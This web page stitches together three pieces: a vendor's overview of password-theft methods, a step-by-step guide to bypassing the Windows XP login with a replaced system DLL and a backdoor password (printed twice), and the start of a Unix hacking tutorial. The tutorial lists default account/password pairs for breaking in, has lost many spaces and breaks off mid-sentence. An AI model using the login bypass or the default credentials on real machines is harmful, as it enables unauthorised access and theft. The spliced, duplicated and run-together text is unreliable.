Most browsers, including Internet Explorer® and Netscape®, the AOL® client, and Windows® Dial-Up Connections allow you the option to store passwords. These passwords are stored on the local machine and (depending upon where and how it is stored) there is usually a method of recovering these passwords. Storing any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. While we are not currently aware of any program to recover locally stored AOL® passwords, we do not recommend that these are secure. Software does exist that can recover most of the other types of locally stored passwords.
TROJAN
A Trojan is a program that is sent to a user that allows an attacker to control functions of the target computer, recover information from the target or to delete or damage files on the target. The name Trojan is given because the program will usually come attached to some other program or file that entices you to run it. There are a wide variety of Trojans any number of which can be programmed to capture passwords as they are typed and to email or transmit them to a third party. To protect yourself against Trojans, you should never execute or download software or files that are not from a trusted source. It is critical that anyone working on internet use a virus protection program (which should catch most Trojans.) Note that since a Trojan requires the password to be typed or stored in order to be recovered, this is not an effective way to recover your own password. It could explain, however, how someone could lose their password to a hacker. Sending someone a Trojan program is certainly illegal and we do not recommend or condone this activity. A Trojan is unlikely to be effective in recovering a particular account password since it requires the target to install it. However, hackers will often bulk mail Trojans to thousands of people in the hope that a small percentage will get caught. Legitimate account holders who may have been caught by a Trojan and can authenticate themselves should contact their service provider to have their account passwords reset.
KEYLOGGER
A keylogger is a program or piece of hardware that records all keyboard keystrokes to an encrypted file which can then be read later. Based on the order of the keystrokes, it is usually easy to identify the password(s) from the file later. Like the Trojan, this also requires that someone actually type the password. Keyloggers come in two types: hardware and software. A hardware keylogger can be fitted between the keyboard cable and the computer and can be activated with a few keystrokes. It is then left in place until after the password that you are looking to recover is typed. Later it is removed and the file of keystrokes is examined for the password. A hardware keylogger is undectable by anti-virus software. A software keylogger is installed on a system and effectively has the same function, however, it is a little bit more complex to use since it must be installed to run stealthily to be effective. A keylogger could be used to steal a password from someone who is using an office computer or sharing a computer. It is possible that installing and using such a device or piece of software could be illegal depending upon whether the target has a presumption of privacy when using the computer on which the keylogger is installed.
IMPERSONATION
It is possible to impersonate a program on a computer by launching windows that look like something else. For instance, let's say you login to the MSN® service and visit a website (in this case a hostile website.) It would be possible for this website to pop-up some windows that look like something else. They could look almost identical to windows that an inexperienced user might expect from his local computer. The user could be fooled into submitting information to the hostile website. For instance, consider the effect of seeing the following series of windows:
If these could trick you into entering your password, then you could end-up sending your password to the attacker. Windows such as these could be created to mirror virtually any program or series of actions. Your browser will likely identify your operating system and your IP address might identify your ISP. Therefore, a hostile website could target you with a series of screen shots that look exactly as they should on your system. The key is that the screen shots are not coming from your system, but are coming from the hostile website. First, creating such a hostile website is probably fraudulent and illegal. We do not recommend or condone this activity. To protect yourself against this type of attack, make sure to configure your browser for high security and enable warnings for any code that is executed on your system.
SNIFFING
If two people do not share the same computer, but do share the same network, it may be possible for one to sniff the others' packets as they sign-on. The traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or "played-back." This is not a simple attack to execute, but is possible if two people are close to one another and share a hub. Again, this is likely to be illegal and we do not condone this activity.
BRUTE-FORCE ATTACK
Many people want to find software to perform a brute-force attack. This is really impractical. It would take hundreds of thousands of years to attempt any kind of reasonable brute-force attack on AOL®, Yahoo® or Hotmail® and this would expand exponentially if the password is longer than the minimum length. Using multiple computers or multiple sessions could reduce this to merely thousands of years. This is highly illegal since these services own the servers on which an account is hosted. Even if you are hacking your own account, you don't own the servers and the service is going to monitor and log this activity. It is extremely unlikely that you could recover a password in this way, but it is extremely likely that you'd be arrested and prosecuted for doing this.
SOCIAL ENGINEERING
Social engineering is the name given to the art of attacking the person, rather than the computer or system. The basic principle is that many people can be talked into giving someone else their id and password if they think it is someone that they can trust. For instance, I might call someone and say I was from AOL and that I was finally getting around to responding to their technical support question. I would then ask you to describe the problem that you are having and tell you that we have a solution. However, I just need to verify the account. Can you give me the username and password again? A surprising number of people would fall for this obvious scam. There is no limit as to how elaborate this can be. The more information that is given by the caller, the more realistic or believable the call is. Again, never give your password to anyone. No legitimate customer service representative will ask for this information.
These are the basic methods that we are aware of for hacking an AOL®, Yahoo®, Hotmail® or any other dial-up or on-line password. Hopefully this will answer some questions and help you protect yourself against these attacks.
Password Crackers, Inc. does offer an America Online (AOL)® Personal Filing Cabinet (.pfc) conversion service. We can convert AOL® Personal Filing Cabinets (.pfc) to either Netscape®, Microsoft Outlook® (.pst) or text (.txt) formats. You can get more information about this service here.
How to Hack Into a Windows XP Computer Without Changing Password
Another method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords.There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.
Steps to Hack into a Windows XP Computer without changing password:
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.2. Download DreamPackPL HERE.3. Unzip the downloaded dreampackpl.zip and you’ll get dreampackpl.ISO.4. Use any burning program that can burn ISO images.5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.6. Press “R” to install DreamPackPL.7. Press “C” to install DreamPackPL by using the recovery console.8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)9. Backup your original sfcfiles.dll by typing:“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)10. Copy the hacked file from CD to system32 folder. Type:“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)11. Type “exit”, take out disk and reboot.12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.13. Click the top graphic on the DreamPack menu and you will get a menu popup.14. Go to commands and enable the options and enable the god command.15. Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive
Steps to Hack into a Windows XP Computer without changing password:
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.2. Download DreamPackPL HERE.3. Unzip the downloaded dreampackpl.zip and you’ll get dreampackpl.ISO.4. Use any burning program that can burn ISO images.5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.6. Press “R” to install DreamPackPL.7. Press “C” to install DreamPackPL by using the recovery console.8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)9. Backup your original sfcfiles.dll by typing:“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)10. Copy the hacked file from CD to system32 folder. Type:“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)11. Type “exit”, take out disk and reboot.12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.13. Click the top graphic on the DreamPack menu and you will get a menu popup.14. Go to commands and enable the options and enable the god command.15. Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive
A Hacking Tutorial
This phile is geared as an UNIX tutorial at first, to let you get morefamiliar with the operating system. UNIX is just an operating system, asis MS-DOS, AppleDOS, AmigaDOS, and others. UNIX happens to be a multi-user-multi-tasking system, thus bringing a need for security not found on MSDOS,AppleDOS, etc. This phile will hopefully teach the beginners who do not havea clue about how to use UNIX a good start, and may hopefully teach old prossomething they didn't know before. This file deals with UNIX SYSTEM V andits variants. When I talk about unix, its usually about SYSTEM V (rel 3.2).Where Can I be found? I have no Idea. The Boards today are going Up'n'Downso fast, 3 days after you read this file, if I put a BBS in it where you couldreach me, it may be down! Just look for me.I can be reached on DarkWood Castle [If it goes back up], but that boardis hard to get access on, but I decided to mention it anyway.I *COULD* Have been reached on jolnet, but......This file may have some bad spelling, etc, or discrepencies since it wasspread out over a long time of writing, because of school, work, Girl friend,etc. Please, no flames. If you don't like this file, don't keep it.This is distributed under PHAZE Inc. Here are the members (and ex ones)The Dark PawnThe Data WizardSir Hackalot (Me)Taxi (ummm.. Busted)Lancia (Busted)The British Knight (Busted)The Living Pharoah (Busted)_____________________________________________________________________________-------------o Dedication:------------- This phile is dedicated to the members of LOD that were raided inAtlanta. The members that got busted were very good hackers, especiallyThe Prophet. Good luck to you guys, and I hope you show up again somewhere._____________________________________________________________________________------------------------o A little History, etc:------------------------ UNIX, of course, was invented By AT&T in the 60's somewhere, to be"a programmer's operating system." While that goal was probably not reachedwhen they first invented UNIX, it seems that now, UNIX is a programmer's OS.UNIX, as I have said before, is a multi-tasking/multi-user OS. It is alsowritten in C, or at least large parts of it are, thus making it a portableoperating system. We know that MSDOS corresponds to IBM/clone machines,right? Well, this is not the case with UNIX. We do not associate it withany one computer since it has been adapted for many, and there are manyUNIX variants [that is, UNIX modified by a vendor, or such]. Some AT&Tcomputers run it, and also some run MSDOS [AT&T 6300]. The SUN workstationsrun SunOS, a UNIX variant, and some VAX computers run Ultrix, a VAX versionof UNIX. Remember, no matter what the name of the operating system is [BSD,UNIX,SunOS,Ultrix,Xenix, etc.], they still have a lot in common, such as thecommands the operating system uses. Some variants may have features othersdo not, but they are basically similar in that they have a lot of the samecommands/datafiles. When someone tries to tell you that UNIX goes along witha certain type of computer, they may be right, but remember, some computershave more than one Operating system. For instance, one person may tell youthat UNIX is to a VAX as MSDOS is to IBM/clones. That is untrue, and theonly reason I stated that, was because I have seen many messages with info/comparisons in it like that, which confuse users when they see a VAX runningVMS.____________________________________________________________________________-------------------------------o Identifying a Unix/Logging in------------------------------- From now on, I will be referring to all the UNIX variants/etc asUNIX, so when I say something about UNIX, it generally means all the variants(Unix System V variants that is: BSD, SunOS, Ultrix, Xenix, etc.), unlessI state a variant in particular. Okay. Now its time for me to tell you how a unix USUALLY greets you.First, when you call up a UNIX, or connect to one however you do, you willusually get this prompt:login:Ok. Thats all fine and dandy. That means that this is PROBABLY a Unix,although there are BBS's that can mimic the login procedure of an OS(Operating System), thus making some people believe its a Unix. [Hah!].Some Unixes will tell you what they are or give you a message before alogin: prompt, as such:Welcome to SHUnix. Please log in.login: Or something like that. Public access Unixes [like Public BBSs] willtell you how to logon if you are a new users. Unfortunatly, this phile isnot about public access Unixes, but I will talk about them briefly later, asa UUCP/UseNet/Bitnet address for mail. OK. You've gotten to the login prompt! Now, what you need to dohere is enter in a valid account. An Account usually consists of 8 charactersor less. After you enter in an account, you will probably get a passwordprompt of some sort. The prompts may vary, as the source code to the loginprogram is usually supplied with UNIX, or is readily available for free.Well, The easiest thing I can say to do to login is basically this:Get an account, or try the defaults. The defaults are ones that came withthe operating system, in standard form. The list of some of the Defaultsare as follows:ACCOUNT PASSWORD------- --------root root - Rarely open to hackerssys sys / system / binbin sys / binmountfsys mountfsysadm admuucp uucpnuucp anonanon anonuser usergames gamesinstall installreboot * See Belowdemo demoumountfsys umountfsyssync syncadmin adminguest guestdaemon daemonThe accounts root, mountfsys, umountfsys, install, and sometimes sync areroot level accounts, meaning they have sysop power, or total power. Otherlogins are just "user level" logins meaning they only have power over whatfiles/processes they own. I'll get into that later, in the file permissionssection. The REBOOT login is what as known as a command login, which justsimply doesn't let you into the operating system, but executes a programassigned to it. It usually does just what it says, reboot the system. Itmay not be standard on all UNIX systems, but I have seen it on UNISYS unixesand also HP/UX systems [Hewlett Packard Unixes]. So far, these accounts havenot been passworded [reboot], which is real stupid, if you ask me.COMMAND LOGINS:---------------There are "command logins", which, like reboot, execute a command then logyou off instead of letting you use the command interpreter. BSD is notoriousfor having these, and concequently, so does MIT's computers. Here are some:rwho - show who is onlinefinger - samewho - sameThese are the most useful, since they will give the account names that areonline, thus showing you several accounts that actually exist.Errors:-------When you get an invalid Account name / invalid password, or both, you willget some kind of error. Usually it is the "login incorrect" message. Whenthe computer tells you that, you have done something wrong by either enterringan invalid account name, or a valid account name, but invalid password. Itdoes not tell you which mistake you made, for obvious reasons. Also,when you login incorrectly, the error log on the system gets updated, lettingthe sysops(s) know something is amiss. Another error is "Cannot change to home directory" or "Cannot ChangeDirectory." This means that no "home directory" which is essentially the'root' directory for an account, which is the directory you start off in.On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in/homedirectory. [Note: The / is used in directories on UNIX, not a \ ].Most systems will log you off after this, but some tell you that they willput you in the root directory [ '/']. Another error is "No Shell". This means that no "shell" was definedfor that particular account. The "shell" will be explained later. Somesystems will log you off after this message. Others will tell you that theywill use the regular shell, by saying "Using the bourne shell", or "Using sh"-----------------------------Accounts In General :----------------------------- This section is to hopefully describe to you the user structurein the UNIX environment. Ok, think of UNIX having two levels of security: absolute power,or just a regular user. The ones that have absolute power are those usersat the root level. Ok, now is the time to think in numbers. Unix associatesnumbers with account names. each account will have a number. Some will havethe same number. That number is the UID [user-id] of the account. the rootuser id is 0. Any account that has a user id of 0 will have root access.Unix does not deal with account names (logins) but rather the numberassociated with them. for instance, If my user-id is 50, and someone else'sis 50, with both have absolute power of each other, but no-one else._____________________________________________________________________________---------------Shells :--------------- A shell is an executable program which loads and runs when a userlogs on, and is in the foreground. This "shell" can be any executable prog-ram, and it is defined in the "passwd" file which is the userfile. Eachlogin can have a unique "shell". Ok. Now the shell that we usually will workwith is a command interpreter. A command interpreter is simply somethinglike MSDOS's COMMAND.COM, which processes commands, and sends them to thekernel [operating system]. A shell can be anything, as I said before,but the one you want to have is a command interpreter. Here are theusual shells you will find:sh - This is the bourne shell. It is your basic Unix "COMMAND.COM". It has a "script" language, as do most of the command interpreters on Unix sys- tems.csh - This is the "C" shell, which will allow you to enter "C" like commands.ksh - this is the korn shell. Just another command interpreter.tcsh - this is one, which is used at MIT I believe. Allows command editing.vsh - visual shell. It is a menu driven deal. Sorta like.. Windows for DOSrsh - restricted shell OR remote shell. Both Explained later. There are many others, including "homemade " shells, which areprograms written by the owner of a unix, or for a specific unix, and theyare not standard. Remember, the shell is just the program you get to useand when it is done executing, you get logged off. A good example of ahomemade shell is on Eskimo North, a public access Unix. The shellis called "Esh", and it is just something like a one-key-press BBS,but hey, its still a shell. The Number to eskimo north is 206-387-3637.[206-For-Ever]. If you call there, send Glitch Lots of mail. Several companies use Word Processors, databases, and other thingsas a user shell, to prevent abuse, and make life easier for unskilled computeroperators. Several Medical Hospitals use this kind of shell in Georgia,and fortunatly, these second rate programs leave major holes in Unix.Also, a BBS can be run as a shell. Check out Jolnet [312]-301-2100, theygive you a choice between a command interpreter, or a BBS as a shell.WHen you have a command interpreter, the prompt is usually a: $when you are a root user the prompt is usually a: #The variable, PS1, can be set to hold a prompt.For instance, if PS1 is "HI:", your prompt will be: HI:_____________________________________________________________________________------------------------SPecial Characters, ETc:------------------------Control-D : End of file. When using mail or a text editor, this will endthe message or text file. If you are in the shell and hit control-d you getlogged off.Control-J: On some systems, this is like the enter key.@ : Is sometimes a "null"? : This is a wildcard. This can represent a letter. If you specified something at the command line like "b?b" Unix would look for bob,bib,bub, and every other letter/number between a-z, 0-9.* : this can represent any number of characters. If you specified a "hi*" it would use "hit", him, hiiii, hiya, and ANYTHING that starts with hi. "H*l" could by hill, hull, hl, and anything that starts with an H and ends with an L.[] - The specifies a range. if i did b[o,u,i]b unix would think: bib,bub,bob if i did: b[a-d]b unix would think: bab,bbb,bcb,bdb. Get the idea? The [], ?, and * are usually used with copy, deleting files, and directory listings.EVERYTHING in Unix is CASE sensitive. This means "Hill" and "hill" are notthe same thing. This allows for many files to be able to be stored, since"Hill" "hill" "hIll" "hiLl", etc. can be different files. So, when usingthe [] stuff, you have to specify capital letters if any files you are dealingwith has capital letters. Most everything is lower case though.----------------Commands to use:----------------Now, I will rundown some of the useful commands of Unix. I will actas if I were typing in the actual command from a prompt.ls - this is to get a directory. With no arguments, it will just print out file names in either one column or multi-column output, depending on the ls program you have access to. example: $ ls hithere runme note.text src $ the -l switch will give you extended info on the files. $ ls -l rwx--x--x sirhack sirh 10990 runme and so on....the "rwx--x--x" is the file permission. [Explained Later]the "sirhack sirh" is the owner of the file/group the file is in.sirhack = owner, sirh = user-group the file is in [explained later]the 10990 is the size of the file in bytes."runme" is the file name.The format varies, but you should have the general idea.cat - this types out a file onto the screen. should be used on text files. only use it with binary files to make a user mad [explained later] ex: $ cat note.txt This is a sample text file! $cd - change directory . You do it like this: cd /dir/dir1/dir2/dirn. the dir1/etc.... describes the directory name. Say I want to get to the root directory. ex: $ cd / *ok, I'm there.* $ ls bin sys etc temp work usr all of the above are directories, lets say. $ cd /usr $ ls sirhack datawiz prophet src violence par phiber scythian $ cd /usr/sirhack $ ls hithere runme note.text src $ok, now, you do not have to enter the full dir name. if you are ina directory, and want to get into one that is right there [say "src"], youcan type "cd src" [no "/"]. Instead of typing "cd /usr/sirhack/src" from thesirhack dir, you can type "cd src"cp - this copies a file. syntax for it is "cp fromfile tofile" $ cp runme runme2 $ ls hithere runme note.text src runme2Full pathnames can be included, as to copy it to another directory. $ cp runme /usr/datwiz/runmemv - this renames a file. syntax "mv oldname newname" $ mv runme2 runit $ ls hithere runme note.text src runit files can be renamed into other directories. $ mv runit /usr/datwiz/run $ ls hithere runme note.text src $ ls /usr/datwiz runme runpwd - gives current directory $ pwd /usr/sirhack $ cd src $ pwd /usr/sirhack/src $ cd .. $ pwd /usr/sirhack [ the ".." means use the name one directory back. ] $ cd ../datwiz [translates to cd /usr/datwiz] $ pwd /usr/datwiz $ cd $home [goto home dir] $ pwd /usr/sirhackrm - delete a file. syntax "rm filename" or "rm -r directory name" $ rm note.text $ ls hithere runme src $write - chat with another user. Well, "write" to another user.syntax: "write username" $ write scythian scythian has been notified Hey Scy! What up?? Message from scythian on tty001 at 17:32 hey! me: So, hows life? scy: ok, I guess. me: gotta go finish this text file. scy: ok me: control-D [to exit program] $who [w,who,whodo] - print who is online $ who login term logontime scythian + tty001 17:20 phiberO + tty002 15:50 sirhack + tty003 17:21 datawiz - tty004 11:20 glitch - tty666 66:60 $ the "who" commands may vary in the information given. a "+" means you can "write" to their terminal, a "-" means you cannot.man - show a manual page entry. syntax "man command name" This is a help program. If you wanted to know how to use... "who" you'd type $ man who WHO(1) xxx...... and it would tell you.stty - set your terminal characteristics. You WILL have to do "man stty" since each stty is different, it seems like. an example would be: $ stty -parenb to make the data params N,8,1. A lot of Unixes operate at e,7,1 by default.sz,rz - send and recieve via zmodemrx,sx - send / recieve via xmodemrb,sb - send via batch ymodem. These 6 programs may or may not be on a unix.umodem - send/recieve via umodem. $ sz filename ready to send... $ rz filename please send your file.... ...etc..ed - text editor. Usage "ed filename" to create a file that doesn't exist, just enter in "ed filename" some versions of ed will give you a prompt, such as "*" others will not $ ed newtext 0 * a This is line 1 This is line 2 [control-z] * 1 [to see line one] This is line 1 * a [keep adding] This is line 3 [control-z] *0a [add after line 0] This is THE first line [control-z] 1,4l This is THE first line This is line 1 This is line 2 This is line 3 * w 71 * q $ The 71 is number of bytes written. a = append l = list # = print line number w - write l fname = load fname s fname = save to fname w = write to current file q = quitmesg - turn write permissions on or off to your terminal (allow chat) format "mesg y" or "mesg n"cc - the C compiler. don't worry about this one right now.chmod - change mode of a file. Change the access in other words. syntax: "chmod mode filename" $ chmod a+r newtext Now everyone can read newtext. a = all r = read. This will be explained further in the File System section.chown - change the owner of a file. syntax: "chown owner filename" $ chown scythian newtext $chgrp - change the group [explained later] of a file. syntax: "chgrp group file" $ chgrp root runme $finger - print out basic info on an account. Format: finger usernamegrep - search for patterns in a file. syntax: "grep pattern file" $ grep 1 newtext This is Line 1 $ grep THE newtext This is THE first line $ grep "THE line 1" newtext $mail - This is a very useful utility. Obviously, you already know what it is by its name. There are several MAIL utilities, such as ELM, MUSH and MSH, but the basic "mail" program is called "mail". The usage is: "mail username@address" or "mail username" or "mail" or "mail addr1!addr2!addr3!user" "mail username@address" - This is used to send mail to someone onanother system, which is usually another UNIX, but some DOS machines and someVAX machines can recieve Unix Mail. When you use "mail user@address" thesystem you are on MUST have a "smart mailer" [known as smail], and musthave what we call system maps. The smart mailer will find the "adress" partof the command and expand it into the full pathname usually. I could looklike this: mail phiber@optik then look like this to the computer: mail sys1!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiberDo not worry about it, I was merely explaining the principal of the thing.Now, if there is no smart mailer online, you'll have to know the FULL pathname of the person you wish to mail to. For Instance, I want to mail to.. phiber. I'd do this if there were no smart mailer: $ mail sys!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber Hey Guy. Whats up? Well, gotta go. Nice long message huh? [control-D] $Then, when he got it, there would be about 20 lines of information, withlike a post mark from every system my message went thru, and the "from" linewould look like so:From optik!sirhacksys!att.com!sc1!sbell!pacbell!unisys!sys!sirhack Now, for local mailing, just type in "mail username" where usernameis the login you want to send mail to. Then type in your message. Thenend it with a control-D. To read YOUR mail, just type in mail. IE: $ mail From scythian ............ To sirhack ............ Subject: Well.... Arghhh! ? The dots represent omitted crap. Each Mail program makes its own headings. That ? is a prompt. At this prompt I can type: d - delete f username - forward to username w fname - write message to a file named fname s fname - save message with header into file q - quit / update mail x - quit, but don't change a thing m username - mail to username r - reply [enter] - read next message + - go forward one message - : go back one h - print out message headers that are in your mailbox.There are others, to see them, you'd usually hit '?'.--------If you send mail to someone not on your system, you will have to wait longerfor a reply, since it is just as a letter. A "postman" has to pick it up.The system might call out, and use UUCP to transfer mail. Usually, uucpaccounts are no good to one, unless you have uucp available to intercept mail.ps - process. This command allows you to see what you are actually doingin memory. Everytime you run a program, it gets assigned a Process Id number(PID), for accounting purposes, and so it can be tracked in memory, aswell as shut down by you, or root. usually, the first thing in a processlist given by "ps" is your shell name. Say I was logged in under sirhack,using the shell "csh" and running "watch scythian". The watch program wouldgo into the background, meaning I'd still be able to do things while it wasrunning: $ ps PID TTY NAME 122 001 ksh 123 001 watch $ That is a shortened PS. That is the default listing [a brief one]. The TTY column represents the "tty" [i/o device] that the process is being run from. This is only useful really if you are using layers (don't worry) or more than one person is logged in with the same account name. Now, "ps -f" would give a full process listing on yourself, so instead of seeing just plain ole "watch" you'd most likely see "watch scythian"kill - kill a process. This is used to terminate a program in memory obvio-ously. You can only kill processes you own [ones you started], unless youare root, or your EUID is the same as the process you want to kill.(Will explain euid later). If you kill the shell process, you are loggedoff. By the same token, if you kill someone else's shell process, theyare logged off. So, if I said "kill 122" I would be logged off. However,kill only sends a signal to UNIX telling it to kill off a process. Ifyou just use the syntax "kill pid" then UNIX kills the process WHEN it feelslike it, which may be never. So, you can specify urgency! Try "kill -num pid"Kill -9 pid is a definite kill almost instantly. So if I did this: $ kill 122 $ kill 123 $ ps PID TTY NAME 122 001 ksh 123 001 watch $ kill -9 123 [123]: killed $ kill -9 122 garbage NO CARRIERAlso, you can do "kill -1 0" to kill your shell process to log yourself off.This is useful in scripts (explained later).-------------------Shell Programmin'------------------- Shell Programming is basically making a "script" file for thestandard shell, being sh, ksh, csh, or something on those lines. Itslike an MSDOS batch file, but more complex, and more Flexible.This can be useful in one aspect of hacking.First, lets get into variables. Variables obviously can be assignedvalues. These values can be string values, or numberic values.number=1 That would assign 1 to the variable named "number".string=Hi Thereorstring="Hi There" Both would assign "Hi there" to a variable. Using a variable is different though. When you wish to use a variable you must procede it with a dollar ($) sign. These variables can be used as arguments in programs. When I said that scripts are like batch files, I meant it. You can enter in any name of a program in a script file, and it will execute it. Here is a sample script.counter=1arg1="-uf"arg2="scythian"ps $arg1 $arg2echo $counter That script would translate to "ps -uf scythian" then would print "1" after that was finished. ECHO prints something on the screen whether it be numeric, or a string constant.Other Commands / Examples:read - reads someting into a variable. format : read variable . No dollar sign is needed here! If I wwanted to get someone's name, I could put:echo "What is your name?"read hisnameecho Hello $hisname What is your name? Sir Hackalot Hello Sir Hackalot Remember, read can read numeric values also.trap - This can watch for someone to use the interrupt character. (Ctrl-c) format: trap "command ; command ; command ; etc.."Example: trap "echo 'Noway!! You are not getting rid o me that easy' ; echo 'You gotta see this through!'" Now, if I hit control-c during the script after this statement was executed, I'd get: Noway!! You are not getting rid of me that easy You gotta see this through!exit : format :exit [num] This exists the shell [quits] with return code of num.-----CASE----- Case execution is like a menu choice deal. The format of the command or structure is : case variable in 1) command; command;; 2) command; command; command;; *) command;; esac Each part can have any number of commands. The last command however must have a ";;". Take this menu: echo "Please Choose:" echo "(D)irectory (L)ogoff (S)hell" read choice case $choice in D) echo "Doing Directory..."; ls -al ;; L) echo Bye; kill -1 0;; S) exit;; *) Echo "Error! Not a command";; esac The esac marks the end of a case function. It must be after the LAST command.Loops----- Ok, loops. There are two loop functins. the for loops, and the repeat. repeat looks like this: repeat something somethin1 somethin2 this would repeat a section of your script for each "something". say i did this: repeat scythian sirhack prophet I may see "scythian" then sirhack then prophet on my screen. The for loop is defined as "for variable in something do .. .. done" an example: for counter in 1 2 3 do echo $counter done That would print out 1 then 2 then 3.Using TEST----------The format: Test variable option variableThe optios are:-eq =-ne <> (not equal)-gt >-lt <-ge >=-le <=for strings its: = for equal != for not equal.If the condition is true, a zero is returned. Watch: test 3 -eq 3that would be test 3 = 3, and 0 would be returned.EXPR----This is for numeric functions. You cannot simply type inecho 4 + 5and get an answer most of the time. you must say:expr variable [or number] operator variable2 [or number]the operators are:+ add- subtract* multiply/ divide^ - power (on some systems)example : expr 4 + 5var = expr 4 + 5var would hold 9. On some systems, expr sometimes prints out a formula. I mean, 22+12 is not the same as 22 + 12. If you said expr 22+12 you would see: 22+12 If you did expr 22 + 12 you'd see: 34SYSTEM VARIABLES---------------- These are variables used by the shell, and are usually set in thesystem wide .profile [explained later].HOME - location of your home directory.PS1 - The prompt you are given. usually $ . On BSD its usually &PATH - This is the search path for programs. When you type in a programto be run, it is not in memory; it must be loaded off disk. Most commandsare not in Memory like MSDOS. If a program is on the search path, it maybe executed no matter where you are. If not, you must be in the directorywhere the program is. A path is a set of directories basically, seperated by":"'s. Here is a typical search path: :/bin:/etc:/usr/lbin:$HOME:When you tried to execute a program, Unix would look for it in /bin,/etc, /usr/lbin, and your home directory, and if its not found, an error isspewed out. It searches directories in ORDER of the path. SO if you had aprogram named "sh" in your home directory, and typed in "sh", EVEN ifyou were in your home dir, it would execute the one in /bin. So, youmust set your paths wisely. Public access Unixes do this for you, but systemsyou may encounter may have no path set.TERM - This is your terminal type. UNIX has a library of functions called"CURSES" which can take advantage of any terminal, provided the escapecodes are found. You must have your term set to something if you runscreen oriented programs. The escape codes/names of terms are foundin a file called TERMCAP. Don't worry about that. just set your termto ansi or vt100. CURSES will let you know if it cannot manipulate yourterminal emulation.-------------------The C compiler------------------- This Will be BRIEF. Why? Becuase if you want to learn C, go buy a book. I don't have time to write another text file on C, for it would be huge. Basically, most executables are programmed in C. Source code files on unix are found as filename.c . To compile one, type in "cc filename.c". Not all C programs will compile, since they may depend on other files not there, or are just modules. If you see a think called "makefile" you can usually type in just "make" at the command prompt, and something will be compiled, or be attempted to compile. When using make or CC, it would be wise to use the background operand since compiling sometimes takes for ever. IE: $ cc login.c& [1234] $ (The 1234 was the process # it got identified as)._____________________________________________________________________________---------------The FILE SYSTEM--------------- This is an instrumental part of UNIX. If you do not understand thissection, you'll never get the hang of hacking Unix, since a lot of Pranksyou can play, and things you can do to "raise your access" depend on it.First, Let's start out by talking about the directory structure. It isbasically a Hiearchy file system, meaning, it starts out at a root directoryand expands, just as MSDOS, and possibly AmigaDos.Here is a Directory Tree of sorts: (d) means directory / (root dir) -------------------- bin (d) usr (d) ----^-------------------- sirhack(d) scythian (d) prophet (d) src (d)Now, this particular system contains the following directories://bin/usr/usr/sirhack/usr/sirhack/src/usr/scythian/usr/prophetHopefully, you understood that part, and you should. Everything spawns fromthe root directory.o File Permissions!------------------Now, this is really the biggie. File Permissions. It is not that hard tounderstand file permissions, but I will explain them deeply anyway.OK, now you must think of user groups as well as user names. Everyonebelongs to a group. at the $ prompt, you could type in 'id' to see whatgroup you are in. Ok, groups are used to allow people access certain things,instead of just having one person controlling/having access to certain files.Remember also, that Unix looks at someone's UID to determine access, notuser name.Ok. File permissions are not really that complicated. Each file has an ownerThis OWNER is usually the one who creates the file, either by copying a fileor just by plain editing one. The program CHOWN can be used to give someoneownership of a file. Remember that the owner of a file must be the one whoruns CHOWN, since he is the only one that can change the permissions of a fileAlso, there is a group owner, which is basically the group that you were inwhen the file was created. You would use chgrp to change the group a file isin.Now, Files can have Execute permissions, read permissions, or write permission.If you have execute permission, you know that you can just type in the nameof that program at the command line, and it will execute. If you have readpermission on a file, you can obviously read the file, or do anything thatreads the file in, such as copying the file or cat[ing] it (Typing it).If you do NOT have access to read a file, you can't do anything that requiresreading in the file. This is the same respect with write permission. Now,all the permissions are arranged into 3 groups. The first is the owner'spermissions. He may have the permissions set for himself to read and executethe file, but not write to it. This would keep him from deleting it.The second group is the group permissions. Take an elongated directoryfor an example: $ ls -l runme r-xrwxr-- sirhack root 10990 March 21 runmeok. Now, "root" is the groupname this file is in. "sirhack" is the owner.Now, if the group named 'root' has access to read, write and execute, theycould do just that. Say .. Scythian came across the file, and was in the rootuser group. He could read write or execute the file. Now, say datawiz cameacross it, but was in the "users" group. The group permissions would notapply to him, meaning he would have no permissions, so he couldn't touchthe file, right? Sorta. There is a third group of permissions, and this isthe "other" group. This means that the permissions in the "other" groupapply to everyone but the owner, and the users in the same group as the file.Look at the directory entry above. the r-x-rwxr-- is the permissions line.The first three characters are the permissions for the owner (r-x). The"r-x" translates to "Read and execute permissions, but no write permissions"the second set of three, r-xRWXr-- (the ones in capital letters) are the grouppermissions. Those three characters mean "Read, write, and execution allowed"The 3rd set, r-xrwxR-- is the permissions for everyone else. It means"Reading allowed, but nothing else". A directory would look something likethis: $ ls -l drwxr-xr-x sirhack root 342 March 11 srcA directory has a "d" at the beggining of 